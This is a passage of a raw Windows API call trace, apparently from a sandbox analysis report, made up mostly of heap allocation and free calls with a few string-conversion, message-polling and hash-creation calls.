dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0251.050] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0251.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0251.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0251.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0251.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0251.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0251.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.057] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0251.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55068 [0251.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0251.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0251.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0251.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0251.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0251.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0251.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 